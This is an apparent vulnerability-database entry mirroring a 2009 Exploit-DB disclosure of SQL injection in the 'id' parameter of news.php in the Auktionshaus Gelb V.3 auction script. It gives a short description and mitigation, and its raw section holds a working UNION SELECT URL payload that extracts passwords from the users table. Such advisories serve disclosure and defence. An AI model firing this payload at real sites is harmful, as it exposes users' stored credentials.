AuktionshausGelb V.3 SQL Injection news.php

vendor:

Auktionhaus Gelb V.3

by:

ea$y laster

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Auktionhaus Gelb V.3

Affected Version From: V.3

Affected Version To: V.3

Patch Exists: NO

Related CWE: N/A

CPE: a:auktionhaus_gelb:auktionhaus_gelb_v3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AuktionshausGelb V.3 SQL Injection news.php

Auktionshaus Gelb V.3 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'id' in the 'news.php' page. This can allow the attacker to gain access to the database and extract sensitive information such as passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

 ########################################################################
 ##AuktionshausGelb V.3 SQL Injection news.php                         ##
 ########################################################################
 ########################################################################
 ## _                     _     _                   _                  ##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
 ##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
 ##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
 ##                                                                    ##
 ########################################################################
##########################################################################
#Script: Auktionshaus Gelb V.3                                           #
#Vulnerabilities [ SQL Injection ]                                       #
#Language: [ PHP ]                                                       #
#Download: [ buy this script ]                                           #
#Founder: [ ea$y laster ]                                                #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]  #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-]                       #
#Price: [ Commercial License EUR 249.90 €                                #
#DEMO : http://xmedien.e-ee.de/auktion3/                                 #
#############################################################################
#http://server/news.php?id=-1+union+select+1,2,password,4,5+from+users+--#
#############################################################################